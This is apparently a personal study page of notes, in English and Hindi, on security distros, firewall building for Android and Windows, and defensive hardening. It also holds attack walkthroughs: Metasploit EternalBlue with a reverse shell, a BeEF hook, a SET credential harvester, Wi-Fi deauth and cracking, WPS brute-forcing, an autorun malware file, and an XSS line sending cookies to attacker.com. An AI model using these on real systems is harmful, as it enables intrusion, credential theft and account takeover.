https://www.istm.gov.in/home/user_datails/234
Kali Linux is a specialized Linux distribution used for ethical hacking, penetration testing, and cybersecurity research.
Parrot OS – Lightweight and privacy-focused; includes hacking + anonymity tools.
BackBox – Ubuntu-based, designed for penetration testing and vulnerability assessment.
BlackArch Linux – Arch-based distro with 2,800+ hacking tools.
Pentoo – Gentoo-based, focused on penetration testing and security auditing.
DEFT Linux – Focused on digital forensics and incident response.
NST (Network Security Toolkit) – Fedora-based, for network security analysis.
CAINE – Specifically for computer forensics and data recovery.
Each has its own strengths — but Kali and Parrot OS are the most widely used for offensive security.
Modus Operandi (MO) is a Latin term that means "method of operation."
In security and crime-related contexts, it refers to:
The specific way or pattern in which a crime or security breach is typically committed.
It includes:
Techniques used by criminals or attackers
Tools or technologies employed
Behavioral patterns and target selection
Timing, location, and method of execution
👉 Understanding the MO helps in anticipating, detecting, and preventing future threats.
Here are common security tips and techniques (especially for cyber and physical security):
🔐 1. Password Safety
Use strong, unique passwords
Enable 2-factor authentication
Avoid sharing passwords
🌐 2. Internet Safety
Avoid clicking on unknown links/emails
Use HTTPS websites only
Clear browsing data regularly
💻 3. Device Protection
Install antivirus and keep it updated
Use firewalls
Lock screen when not in use
🧑💼 4. Social Engineering Awareness
Don’t share sensitive info over calls/emails
Verify identity before responding
Be cautious of phishing or impersonation
📁 5. Data Security
Backup data regularly
Encrypt sensitive files
Follow access control policies
🏢 6. Physical Security
Use ID cards, biometric access
Monitor CCTV regularly
Keep entry-exit logs for visitors
🛑 7. Incident Reporting
Report suspicious activity immediately
Maintain a security incident register
🧠 8. Awareness and Training
Conduct regular awareness sessions
Simulated drills (cyber/physical threats)
Promote a "security-first" culture
You can build a firewall app using Android’s VPNService API, which lets you create a local VPN tunnel and filter traffic.
Android Studio
Java or Kotlin
Basic understanding of Android app development
Permissions: BIND_VPN_SERVICE, INTERNET, etc.
Intercept traffic using VPNService
Filter or block traffic based on app, IP, port, or domain
Allow or deny connections
Optionally log traffic
Create a VPNService subclass
Override establish() to set up tunnel
Use ParcelFileDescriptor to capture traffic
Parse packets (optional: use a library like Pcap4J)
Add filtering rules based on user input
Forward allowed packets to destination
Block or drop others
A rooted Android device means:
You have full control over your phone — like the "admin" or "owner" of everything inside it.
Imagine your phone is a tractor.
Normally, you’re only allowed to drive it and change a few settings.
But you can’t open the engine, change deep parts, or install powerful tools.
When you root it, it’s like getting the master key to open up everything:
You can modify the engine
Remove built-in parts
Add new, custom parts
Do things the company usually doesn’t allow
It removes the restrictions put by the manufacturer (like Samsung, Vivo, etc.)
You can now:
Install special apps
Change system files
Control the whole device like a hacker or developer
Rooting can void warranty
You might break the phone if something goes wrong
Can make your device less secure if not managed properly
So in short:
Rooting = Getting full control of your phone, like becoming the “boss” of it.
If your Android is rooted:
Use iptables (Linux command-line firewall system)
Write your own firewall rules (e.g., block a certain IP, port, or app UID)
Automate with shell scripts or Termux
Example:
bash
CopyEdit
iptables -A OUTPUT -p tcp --dport 80 -j DROP
Set up a Raspberry Pi or old PC with Linux
Install iptables, UFW, or pfSense
Connect all devices through that router/firewall
Control/block traffic network-wide
Custom firewalls need deep packet inspection if you're doing advanced filtering
VPN-based firewalls won’t work simultaneously with commercial VPNs
Be mindful of battery and performance issues if running real-time traffic filters
Platform = Way to Build Firewall
Android (no root) = Use VPNService API (Java/Kotlin app)
Android (rooted) = Use iptables
Laptop/Desktop = Use UFW, Windows Firewall, or write custom scripts
Network-wide = Set up a Raspberry Pi or pfSense box
📱 Android Firewall App (No Root Needed)
Android Studio
Java or Kotlin
API Level 21+
xml
CopyEdit
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.firewall">
<application
android:allowBackup="true"
android:label="Firewall"
android:supportsRtl="true"
android:theme="@style/Theme.AppCompat.Light.DarkActionBar">
<service
android:name=".MyVPNService"
android:permission="android.permission.BIND_VPN_SERVICE">
<intent-filter>
<action android:name="android.net.VpnService" />
</intent-filter>
</service>
</application>
</manifest>
java
CopyEdit
import android.net.VpnService;
import android.os.ParcelFileDescriptor;
import java.io.IOException;
public class MyVPNService extends VpnService {
private ParcelFileDescriptor vpnInterface;
@Override
public void onCreate() {
super.onCreate();
startVPN();
}
private void startVPN() {
Builder builder = new Builder();
builder.setSession("MyFirewallVPN")
.addAddress("10.0.0.2", 32) // Virtual IP
.addRoute("0.0.0.0", 0); // Route all traffic
try {
vpnInterface = builder.establish();
} catch (Exception e) {
e.printStackTrace();
}
}
@Override
public void onDestroy() {
super.onDestroy();
try {
if (vpnInterface != null) {
vpnInterface.close();
vpnInterface = null;
}
} catch (IOException e) {
e.printStackTrace();
}
}
}
xml
CopyEdit
<uses-permission android:name="android.permission.INTERNET" />
java
CopyEdit
import android.content.Intent;
import android.net.VpnService;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;
public class MainActivity extends AppCompatActivity {
private static final int VPN_REQUEST_CODE = 0x0F;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent intent = VpnService.prepare(this);
if (intent != null) {
startActivityForResult(intent, VPN_REQUEST_CODE);
} else {
onActivityResult(VPN_REQUEST_CODE, RESULT_OK, null);
}
}
@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
if (requestCode == VPN_REQUEST_CODE && resultCode == RESULT_OK) {
Intent intent = new Intent(this, MyVPNService.class);
startService(intent);
}
super.onActivityResult(requestCode, resultCode, data);
}
}
Creates a dummy VPN interface
Routes all traffic through it
Doesn’t filter yet — you can build filtering logic using packet inspection libraries (like Pcap4J, jNetPcap)
Add traffic filtering by IP/domain
Use selectors to allow/block traffic per app
Log and display data usage per app
Build a UI with toggles for each app
To create a basic Android firewall app that uses code.
That’s where you’ll write the app.
Android Studio is like the kitchen where you’ll "cook" your app (code, run, test it).
Download & install it (it's free).
Open it — it might take a few minutes to set up.
Click "New Project"
Choose "Empty Activity"
Name your app: e.g., MyFirewallApp
Language: Choose Java
Click Finish
Now Android Studio will create a basic app project for you. Think of it like the empty pot where you'll add your ingredients (your code).
You will see folders like:
css
CopyEdit
app >
java >
com.example.myfirewallapp >
MainActivity.java ← (Paste MainActivity code here)
Double-click MainActivity.java
Replace everything inside it with the code I gave for MainActivity
Next:
scss
CopyEdit
Right-click the same folder (com.example...) → New → Java Class → Name it MyVPNService
Paste the code for MyVPNService.java here.
Now:
You’ll find it here:
nginx
CopyEdit
app > manifests > AndroidManifest.xml
Add the permissions and service code I gave you there.
✅ You can either:
Connect your Android phone via USB (Enable "Developer Options" and "USB Debugging")
Or use the built-in Emulator in Android Studio
Then click the green Play button (▶️) to launch your app.
The app will ask for permission to create a VPN connection
Tap "Allow"
Now your app starts routing traffic — your firewall foundation is ready!
👉 Install it on your laptop or PC.
💻 NOT on your Android phone.
Go to this link on your laptop:
👉 https://developer.android.com/studio
Click the big “Download Android Studio” button
Agree to terms → Download starts
Once the .exe (for Windows) or .dmg (for Mac) file is downloaded:
Open the file
Click Next → Next → Install
After installation, open Android Studio
It gives you the full tools to create Android apps
You write and test your firewall app on your laptop
Then you install it (run it) on your Android phone
Question - Answer
Where to install Android Studio? - 💻 On your laptop
Can I install it on Android phone? - ❌ No, not possible
What do I do after installation? - ✅ Create your app and test it on phone
🟢 What is F-Droid?
F-Droid is like a Play Store — but for free and open-source apps only.
✅ It's a place where you can download Android apps that are:
Free of cost
Open-source (you can see and check the code)
No ads, no tracking, no spying
Often useful for techies, developers, ethical hackers, and privacy-conscious users
It was started by the F-Droid community in 2010
It is maintained by independent developers and privacy advocates
It’s not controlled by Google, which makes it very different from Play Store
Apps like:
🔐 Privacy tools (NetGuard, TrackerControl)
🧑💻 Developer tools (Termux, packet sniffers)
📱 Root tools (AFWall+, OpenVPN, firewall apps)
🧘♀️ Minimal apps (lightweight browsers, note apps, etc.)
Feature = F-Droid = Play Store
Ads - ❌ No ads - ✅ Many apps have ads
Trackers - ❌ No spying - ⚠️ Some apps track you
Source Code - ✅ Open-source - ❌ Not available
Root Tools - ✅ Many available - ❌ Often banned
Free Apps - Totally free - ⚠️ Some paid, some free
⚠️ You won’t find F-Droid on the Play Store (Google doesn't allow it!)
On your phone, open any browser
Go to 👉 https://f-droid.org
Download the F-Droid APK
When asked, allow “Install from unknown sources”
Install and open F-Droid
Browse and install apps like Termux, AFWall+, etc.
Think of F-Droid as a local organic market — everything is clean, open, and safe — compared to a big supermarket (Play Store) that sells both healthy and junk stuff with ads everywhere.
👉 iptables is a firewall command-line tool used in Linux systems (including Android, because Android is built on Linux!).
It helps you:
Block or allow internet for apps
Control incoming and outgoing network traffic
Protect the system by setting rules
iptables is like a digital traffic policeman.
You write rules like:
"Let Chrome go online" ✅
"Block WhatsApp from internet" ❌
"Stop all outgoing traffic" 🚫
(but only if it is rooted ❗)
Not on your laptop.
🔹 1. Termux App (from F-Droid, not Play Store)
A terminal app (like command prompt for Android)
You type commands in it
Works like a mini Linux on your phone
🔹 2. Root Terminal App
Any terminal that allows su (superuser) command
You need to grant root permission when asked
Install Termux from https://f-droid.org/
Open Termux
Type this command to get root access:
bash
CopyEdit
su
(Your phone will ask: "Grant Root Access?" → tap ALLOW)
Now you can use iptables commands like:
bash
CopyEdit
iptables -P OUTPUT DROP # block all outgoing traffic
or:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
(Allow traffic only for an app with UID 10123)
You are doing powerful system-level stuff, so be cautious
These commands only work if your device is rooted
After rebooting, rules go away unless you save them or use a firewall app like AFWall+
If you're not comfortable typing commands, install AFWall+ and just check/uncheck boxes to allow or block apps.
Question - Answer
What is iptables? - A Linux firewall command system
Where to run it? - On rooted Android phone using apps like Termux
Can I run it on laptop? - ❌ No, not for controlling your phone's internet
Is there an easy way? - ✅ Yes! Use AFWall+ app instead
This is like writing your own firewall script — the same as a Linux computer.
A rooted Android device
A terminal app (like Termux or a Root-enabled Terminal Emulator)
Superuser (root) access
BusyBox (optional but helpful)
🔒 Block all outgoing internet:
bash
CopyEdit
su
iptables -P OUTPUT DROP
🌐 Allow only browser (say Chrome) to use internet:
First, find Chrome's UID:
bash
CopyEdit
dumpsys package com.android.chrome | grep userId=
Assume it shows UID: 10123
Now allow only Chrome:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT
🛑 Block WhatsApp from internet:
Find UID of WhatsApp:
bash
CopyEdit
dumpsys package com.whatsapp | grep userId=
Then:
bash
CopyEdit
iptables -A OUTPUT -m owner --uid-owner <WhatsApp_UID> -j DROP
These rules reset after reboot. To make them permanent, use init.d scripts, firewall apps for rooted phones, or write a boot script.
Be careful — blocking the wrong UID might break important apps.
🔹 AFWall+ (Android Firewall Plus)
Free app from Play Store or F-Droid
Uses iptables in background
Easy UI to block internet per app (Wi-Fi/data)
💡 Tip: After installing AFWall+, grant root access, then simply toggle apps to block/allow internet.
Option - Tool - Skill Level
Write your own firewall - iptables in Termux - - Intermediate–Advanced
Easy UI method - AFWall+ = Beginner–Friendly
It means you’ll:
Control which apps can access internet
Block incoming or outgoing connections
Set custom rules to protect your computer from hackers or leaks
Windows already comes with a powerful firewall, and you can create custom rules in it — no need to install anything.
Search "Windows Defender Firewall" in Start Menu
Click “Advanced Settings” on the left side
This opens Windows Firewall with Advanced Security
Now, you’ll see:
Inbound Rules – For connections coming into your computer
Outbound Rules – For connections leaving your computer
Let’s say you want to block Chrome:
Click Outbound Rules > New Rule (on right side)
Select Program > Next
Browse and select the app you want to block (e.g., chrome.exe)
Choose Block the connection > Next
Select all profiles (Domain, Private, Public) > Next
Name it “Block Chrome” > Finish ✅
🎉 Done! Chrome can no longer access the internet.
If you love command-line:
powershell
CopyEdit
New-NetFirewallRule -DisplayName "Block Chrome" -Direction Outbound -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" -Action Block
This does the same as above — but faster.
If you’re a developer (or learning):
Use languages like Python, C#, or C++
Use Windows Filtering Platform (WFP) APIs
Or use WinDivert – a Windows packet capture/divert library
But this is very advanced and not needed unless you're building a full custom product.
Goal = Method
Block internet for apps = Use Windows Firewall Advanced Settings
Do it with commands = Use PowerShell
Build full custom firewall = Use C#/C++ + WinDivert or WFP (Advanced)
Use this if you want to quickly block or allow apps from accessing the internet.
🔐 Example: Block Chrome from using the internet
powershell
CopyEdit
New-NetFirewallRule -DisplayName "Block Chrome Outbound" `
-Direction Outbound `
-Program "C:\Program Files\Google\Chrome\Application\chrome.exe" `
-Action Block
You can first block everything and then allow specific apps:
powershell
CopyEdit
# Block all outbound traffic (⚠️ Be careful!)
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Block
# Allow Notepad
New-NetFirewallRule -DisplayName "Allow Notepad" `
-Direction Outbound `
-Program "C:\Windows\System32\notepad.exe" `
-Action Allow
✅ To undo, run:
powershell
CopyEdit
Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Allow
Press Start → search “PowerShell” → Run as Administrator
Paste the above code and hit Enter
Done! You’ve created a firewall rule 🔐
You can also capture and analyze packets using Python + pydivert (a wrapper for WinDivert).
bash
CopyEdit
pip install pydivert
python
CopyEdit
import pydivert
with pydivert.WinDivert("outbound and ip.DstAddr == 157.240.0.0/16") as w: # Facebook IP Range
for packet in w:
print("Blocked:", packet.dst_addr)
# Drop the packet = block it (do not re-inject)
This will block outbound traffic to Facebook's IP range.
⚠️ Run as Administrator (script needs admin rights to work).
Task = Tool = Code Type
Block an app (e.g., Chrome) = PowerShell = ✅ Simple & Recommended
Block websites/IPs = Python + pydivert = 🔧 Advanced
Custom rule-based blocking = C#/C++ with WinDivert/WFP = 👨💻 Expert Level
You insert the USB pen drive into the port.
The motherboard's USB controller sends a signal to the Windows kernel: “Hey, something new is connected!”
Windows checks what kind of device is connected using Plug and Play (PnP).
It reads the device’s Vendor ID, Product ID, and Device Class.
If drivers are already available, it installs automatically (usually silently in seconds).
Windows sees the USB as a storage device (Disk Drive class).
It checks the file system (FAT32, exFAT, NTFS, etc.)
If it’s valid, it assigns a drive letter (like E:\ or F:)
🔍 This is when you hear the "ding" sound, and the USB becomes visible.
Windows looks for a file called autorun.inf on the drive.
This file can tell Windows: “Open this file or app automatically.”
⚠️ AutoRun is disabled by default in modern Windows (for security), but older PCs or misconfigured systems may still allow it. That’s how viruses can launch automatically.
The explorer.exe process (your file browser) updates the drive list.
You now see the USB in "This PC" and can click to open it.
Here’s how a virus might sneak in:
If AutoRun is on, a file like malware.exe is automatically executed.
This could be a keylogger, ransomware, worm, or backdoor.
Example autorun.inf content:
ini
CopyEdit
[autorun]
open=malware.exe
Even if AutoRun is off, you might double-click an infected file (e.g., PDF, EXE, DOC with macros).
Boom 💥 — virus activates.
It may store itself in:
Startup Folder
C:\Users\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Registry (auto start entry)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
System Folders (hidden)
C:\Windows\System32
C:\Users\<Username>\AppData\Local\Temp
Scheduled Tasks
Creates hidden tasks to auto-run on boot
Renames itself like “svchost.exe” to look like a system file
Hides with attributes: attrib +h +s +r malware.exe
Runs in background silently
Use Task Manager or Process Explorer
Use tools like Autoruns (by Sysinternals)
Scan with good antivirus or Windows Defender Offline Scan
pgsql
CopyEdit
Plug USB → Detected by USB controller → Windows loads driver → Mounts file system → AutoRun checked → File Explorer shows drive → Virus may auto-run or be clicked → Virus copies itself to system folders/startup → Tries to hide and run at boot
Disable AutoRun (usually already disabled in Win 10/11)
Never run unknown EXE files from a USB
Always scan USB with antivirus first
Keep “show hidden files” ON to spot suspicious content
Kali Linux includes:
600+ pre-installed tools
Each tool typically has multiple commands, flags, or usage options
✅ On average, each tool can have 10–50+ commands or options.
➡️ So, roughly:
600 tools × average 20 commands = 12,000+ possible hacking-related commands
This doesn’t even count the standard Linux commands, which are also used for scripting, networking, and automation.
nmap – 30+ common command variations
metasploit (msfconsole) – 1000s of modules (each a command)
aircrack-ng – 10–15 core commands
sqlmap – dozens of flags for different attack vectors
A big toolkit for finding and exploiting vulnerabilities in a target system.
bash
CopyEdit
msfconsole
👉 What it does:
Starts the Metasploit console — the main interface where you type all commands.
bash
CopyEdit
use exploit/windows/smb/ms17_010_eternalblue
👉 What it does:
Loads an exploit that targets a Windows vulnerability called EternalBlue, used in real attacks like WannaCry.
bash
CopyEdit
set RHOSTS <target_ip>
👉 What it does:
Sets the IP address of the victim machine you want to attack.
bash
CopyEdit
set LHOST <your_ip>
👉 What it does:
Sets your own IP address — so when the victim is hacked, it knows where to send access back (reverse shell).
bash
CopyEdit
set PAYLOAD windows/meterpreter/reverse_tcp
👉 What it does:
Tells Metasploit what kind of "weapon" to use. In this case: a reverse shell, which gives you control of the victim’s machine.
bash
CopyEdit
run
👉 What it does:
Launches the attack. If successful, you’ll get access to the victim’s computer.
Used to hack/control someone’s browser when they click a malicious link.
bash
CopyEdit
beef-xss
👉 What it does:
Starts the BeEF server. You use this to trap browsers that visit your fake web page.
html
CopyEdit
<script src="http://your_ip:3000/hook.js"></script>
👉 What it does:
When a victim opens a page with this code, their browser gets hooked — meaning, you can now control their browser from your BeEF panel (e.g., pop-ups, steal cookies, redirect, etc.)
Like Metasploit, but made to hack routers and IoT devices (CCTV, smart TVs, etc.)
bash
CopyEdit
rsf
👉 What it does:
Starts RouterSploit's console.
bash
CopyEdit
use scanners/autopwn
👉 What it does:
Loads the module that automatically scans routers for known weaknesses.
bash
CopyEdit
set target <router_ip>
run
👉 What it does:
Targets the router at that IP and checks if it’s vulnerable to attacks.
Tool to hack into databases behind websites using SQL injection.
bash
CopyEdit
sqlmap -u "http://target.com/product.php?id=1" --dbs
👉 What it does:
-u: URL of the vulnerable page
--dbs: Tells sqlmap to list the databases if the site is vulnerable
If it works, you can read data like usernames, passwords, etc.
Used for command injection attacks — when a web app executes system commands without permission.
bash
CopyEdit
commix --url="http://target.com/index.php?name=test" --data="name=test"
👉 What it does:
Tests if you can inject system commands through the "name" field (like running ls, whoami, etc.) on the target's server.
Used to trick people (phishing) to give up passwords, or click fake websites.
bash
CopyEdit
setoolkit
👉 What it does:
Starts the Social Engineering Toolkit, an interactive menu tool.
Then you'd follow this path:
text
CopyEdit
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
It creates a fake login page (like Facebook), and when the victim enters their password — you get it.
Finds public exploit code from the Exploit Database (offline).
bash
CopyEdit
searchsploit apache struts
👉 What it does:
Searches for exploits related to Apache Struts (a common web app framework).
bash
CopyEdit
searchsploit -m linux/local/37292.c
👉 What it does:
Copies that exploit code into your working folder so you can compile and use it.
Tool = What It Does
Metasploit = Launches real system attacks (full control)
BeEF = Controls browser (like remote puppet)
RouterSploit = Hacks routers, cameras, IoT
sqlmap = Steals data from website databases
Commix = Runs system commands through web inputs
SET = Creates fake websites to trick users
SearchSploit = Lets you search and download real exploit codes
Use Wi-Fi exploitation tools only on networks you own or have permission to test. Unauthorized use is illegal and unethical.
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
wash and reaver (for WPS attacks)
wifite (automated Wi-Fi attack tool)
Fluxion (social engineering-based Wi-Fi phishing)
bash
CopyEdit
sudo airmon-ng start wlan0
👉 What it does: Enables monitor mode on your Wi-Fi card so it can "listen" to all traffic nearby (not just your network).
⚠️ Replace wlan0 with your adapter name if different (iwconfig to check)
bash
CopyEdit
sudo airodump-ng wlan0mon
👉 What it does: Shows nearby networks, BSSIDs (MAC addresses), channels, and client devices.
Note down the BSSID and channel of your target Wi-Fi network.
bash
CopyEdit
sudo airodump-ng --bssid <router_bssid> -c <channel> -w capture wlan0mon
👉 What it does:
Targets a specific router
Captures handshake packets (needed to crack password)
Saves data to a file (capture.cap)
bash
CopyEdit
sudo aireplay-ng --deauth 10 -a <router_bssid> -c <client_mac> wlan0mon
👉 What it does:
Sends fake disconnect signals to the user — when they reconnect, you capture the handshake (Wi-Fi password exchange).
bash
CopyEdit
sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
👉 What it does:
Uses a wordlist (like rockyou.txt) to try different passwords and crack the captured handshake file.
bash
CopyEdit
sudo wifite
👉 What it does:
Scans and attacks Wi-Fi networks automatically using tools above (airodump, aircrack, etc.)
If the router has WPS enabled, try this:
bash
CopyEdit
sudo wash -i wlan0mon
👉 Shows WPS-enabled routers.
bash
CopyEdit
sudo reaver -i wlan0mon -b <bssid> -c <channel> -vv
👉 Tries to brute-force the WPS PIN and get the Wi-Fi password.
Tool = Command = What It Does
airmon-ng = airmon-ng start wlan0 = Enable monitor mode
airodump-ng = airodump-ng wlan0mon = Scan Wi-Fi networks
airodump-ng (target) = airodump-ng --bssid BSSID -c CH -w capture wlan0mon = Capture handshake
aireplay-ng = aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon = Force reconnect
aircrack-ng = aircrack-ng capture.cap -w rockyou.txt = Crack password
wifite = wifite = Auto-attack Wi-Fi
reaver = reaver -i wlan0mon -b BSSID -vv = Brute-force WPS
sudo apt update && sudo apt upgrade -y
The command sudo apt update && sudo apt upgrade -y is commonly used in Debian-based Linux distributions like Kali Linux to update and upgrade the system. Here's the breakdown:
Purpose: Runs the command with superuser (root) privileges because installing, updating, or modifying system files requires administrative rights.
Why Needed: Normal users don’t have permission to make system-wide changes. sudo temporarily grants that power.
Purpose: This is the package manager used in Debian-based systems to handle software installation, updates, and removal.
Think of it as: The "app store" for Linux, but controlled via the terminal.
Purpose: This command tells apt to fetch the latest information about available software packages from online repositories (servers).
What It Does:
Downloads updated lists of available software and their versions.
Does NOT install anything yet—just updates the list.
Analogy: It’s like refreshing the page to see if new apps are available in an app store.
Purpose: Allows you to chain commands together.
How It Works:
Runs the command on the left (sudo apt update).
Only if the first command succeeds, it runs the command on the right (sudo apt upgrade -y).
Why Useful: Ensures you don’t upgrade outdated package lists. It prevents unnecessary errors.
Purpose: Installs the latest versions of all the packages currently installed on your system based on the updated package list from apt update.
What It Does:
Downloads and installs newer versions of software if available.
Keeps your system secure with the latest patches.
Key Point: It does NOT remove old packages—it only upgrades existing ones.
Purpose: Automatically answers "yes" to all prompts that usually ask for confirmation during the upgrade.
Why Useful: Makes the process unattended, especially helpful when automating updates.
Without -y: The system would stop and ask:
"Do you want to continue? [Y/n]"
sudo apt update → Refreshes the list of software.
&& → Ensures the next step only runs if the update succeeded.
sudo apt upgrade -y → Installs all available updates automatically without asking for confirmation.
Apply security at every layer: network, endpoint, application, and data.
Implement network segmentation, micro-segmentation, and least privilege access.
Never trust, always verify—even within internal networks.
Continuously validate user identity, device health, and access policies.
Use tools like Microsoft Defender for Identity, Okta, or ZScaler ZTA solutions.
Deploy EDR solutions like CrowdStrike Falcon, SentinelOne, or Microsoft Defender ATP.
Use real-time analytics and threat hunting features.
Integrate with SIEM for centralized monitoring.
Subscribe to threat intelligence feeds (MISP, AlienVault OTX, IBM X-Force).
Use tools to correlate indicators of compromise (IOCs) with internal logs.
Automate IOC-based blocking using SOAR (Security Orchestration, Automation, and Response).
Use CIS Benchmarks and STIGs to harden systems.
Disable unnecessary ports, services, default accounts.
Monitor configuration drift using tools like Ansible, Chef, or Puppet.
Perform Static (SAST), Dynamic (DAST) and Interactive (IAST) security testing.
Secure APIs using OAuth2, rate limiting, JWT, and input validation.
Conduct threat modeling using STRIDE or DREAD frameworks.
Simulate real-world attacks (Red Team) vs. defenders (Blue Team).
Use MITRE ATT&CK framework to map adversary techniques.
Introduce Purple Teaming for collaboration and continuous improvement.
Implement centralized logging using SIEMs: Splunk, Elastic, QRadar, or Wazuh.
Set up alerts for anomalies like:
Lateral movement
Privilege escalation
Suspicious PowerShell scripts
Enforce IAM policies, multi-factor authentication, and least privilege on cloud platforms (AWS IAM, Azure RBAC, etc.).
Use Cloud Security Posture Management (CSPM) tools: Prisma Cloud, Wiz, Check Point Dome9.
Encrypt data at rest and in transit using KMS/HSM services.
Schedule internal and third-party pentests.
Use Nessus, OpenVAS, Burp Suite, or Metasploit.
Maintain a structured vulnerability disclosure program (VDP) or bug bounty.
Use Threat Hunting Tools: Velociraptor, Osquery, Zeek
Monitor Dark Web Leaks of org data
Deploy Honeytokens and Honeypots to trap attackers
Implement Container & Kubernetes Security: Aqua, Sysdig, Falco
Review supply chain dependencies (e.g., via SCA tools like Snyk or WhiteSource)
Press Windows + R → Type wf.msc → Press Enter
(This opens Windows Defender Firewall with Advanced Security)
In the left panel, click on Outbound Rules
In the right panel, click on New Rule...
Select Program → Click Next
Select This program path:
Click Browse and select any .exe file (e.g., chrome.exe, notepad.exe)
Click Next
Select Block the connection → Click Next
Check all three:
Domain
Private
Public → Click Next
Enter a name like: Block Chrome Internet
Click Finish
✅ Done! That app is now blocked from accessing the internet.
Open Command Prompt as Administrator
Press Windows + X → Select Command Prompt (Admin) or Windows Terminal (Admin)
Run this command to block an IP:
netsh advfirewall firewall add rule name="BlockBadIP" dir=in action=block remoteip=123.123.123.123
Replace 123.123.123.123 with the IP you want to block.
netsh advfirewall firewall delete rule name="BlockBadIP"
netsh advfirewall firewall show rule name="BlockBadIP"
We'll disable the USBSTOR (USB Storage) driver.
🔧 Run this in Command Prompt as Administrator:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
This sets the USB Storage driver to "disabled" (value 4), so no USB devices will load.
To re-enable the USB ports:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 3 /f
This sets the driver back to "manual" start (value 3), allowing USB devices again.
Android devices don’t natively support USB drives unless:
USB OTG (On-The-Go) is enabled.
A USB drive is connected via OTG cable.
To block or control USB access, you'd have to do one of these:
✅ If Your Android is Rooted (More power!)
You can:
Modify system files to disable USB host mode.
Use iptables or SELinux policies to deny mount requests.
Example approach:
su
setprop persist.sys.usb.config none
This disables USB connection modes.
Or block mounting using:
chmod 000 /dev/block/sdX # Replace with actual block device for USB
🚫 If Your Android is Not Rooted
Options are limited, but you can:
Use apps (Device Policy Controllers) that restrict USB data transfer.
Disable OTG via developer options (not always available).
Use MDM (Mobile Device Management) policies in enterprise setups.
You can either block certain IPs or bypass IP blocking.
🔒 Block IPs:
If rooted:
su
iptables -A OUTPUT -d 192.168.1.100 -j DROP
To block a whole range:
iptables -A OUTPUT -d 192.168.0.0/24 -j DROP
If unrooted, install apps like:
NetGuard (open-source, no-root firewall)
NoRoot Firewall
These use VPN-based firewalls to block connections by app or IP.
🕵️♀️ Bypass IP Blocking (If you want access to blocked sites)
Use VPNs like ProtonVPN or custom OpenVPN configs.
Use Tor for Android (Orbot + Orfox).
Use ProxyDroid (requires root) to reroute traffic.
Burp Suite को Kali Linux में चलाना न सिर्फ possible है, बल्कि ये ethical hacking और penetration testing के लिए बहुत commonly इस्तेमाल किया जाने वाला टूल है।
यह एक web vulnerability scanner है जो:
XSS, SQLi जैसी vulnerabilities खोजता है
Intercept करता है browser और server के बीच traffic
Requests को modify करके response चेक करता है
Kali Linux में Burp Suite पहले से install होता है या आप manually भी चला सकते हैं:
चेक करें कि पहले से install है या नहीं:
bash
CopyEdit
which burpsuite
Burp चलाने का तरीका (GUI):
bash
CopyEdit
burpsuite
या फिर Kali के Application Menu में:
mathematica
CopyEdit
Applications → Web Application Analysis → burpsuite
Burp Suite को चलाने के लिए Java चाहिए होता है।
इंस्टॉल करने के लिए:
bash
CopyEdit
sudo apt update
sudo apt install default-jre
Browser (जैसे Firefox) की proxy settings बदलो:
HTTP Proxy: 127.0.0.1
Port: 8080
Burp में Intercept on करो और देखो requests कैसे आ रही हैं।
Cross-Site Scripting (XSS) को भी आसान हिंदी में समझते हैं — एकदम zero level से, और जो आप पूछ रही हो "site copy करके traffic capture होता है?" उसका भी जवाब देते हैं।
XSS एक web-based hacking technique है जिसमें attacker वेबसाइट में malicious (खतरनाक) JavaScript code डाल देता है।
यह हमला वेबसाइट पर नहीं, उसे खोलने वाले यूज़र पर होता है।
तो attacker का मकसद होता है कि user का data चुरा सके — जैसे cookies, login info, या redirect करके fake site पर भेज दे।
नहीं, XSS और Phishing अलग-अलग होते हैं।
Feature
XSS (Cross-Site Scripting)
Phishing / Fake site
क्या बनता है?
असली वेबसाइट ही होती है, बस उसमें attacker ने JS डाला होता है
attacker एक नकली वेबसाइट बनाता है जो दिखती असली जैसी है
Target कौन?
वेबसाइट का विज़िटर (user)
user जो गलती से fake site खोल लेता है
Example क्या होता है?
यूज़र को कुछ क्लिक करने पर उसका cookie चुरा लिया जाता है
user amazon.com की जगह amaz0n-login.com खोल ले
सोचो एक वेबसाइट है: example.com/comments
आप वहाँ comment लिख सकते हो।
अगर site developer ने proper validation नहीं किया,
तो attacker वहाँ ऐसा JS code डाल सकता है:
html
CopyEdit
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie)
</script>
अब जो भी user उस page को खोलेगा — उसका browser attacker को उसकी cookie भेज देगा, जिससे attacker उसके account में login कर सकता है।
XSS में कोई temporary site या full copy नहीं बनती,
बल्कि attacker असली साइट में ही JavaScript injection करता है,
जिससे यूज़र के data पर हमला होता है।
वो होती है: Phishing + DNS Spoofing + MITM (Man-in-the-middle)
Phishing: नकली वेबसाइट जो दिखती है असली जैसी (जैसे amaz0n-login.com)
MITM: बीच में बैठकर data capture करना
DNS Spoofing: user को गलत server की तरफ भेजना
दिल्ली में बैठा एक लड़का अपने ब्राउज़र (Chrome) में amazon.com टाइप करता है, तो उसकी डिवाइस से वेबसाइट तक क्या-क्या होता है, एकदम step-by-step और आसान हिंदी (देवनागरी) में।
Step 1: ब्राउज़र खोलना और URL टाइप करना
रोहन ने अपने लैपटॉप पर Chrome ब्राउज़र खोला और ऊपर address bar में टाइप किया: amazon.com
अब पीछे क्या हुआ?
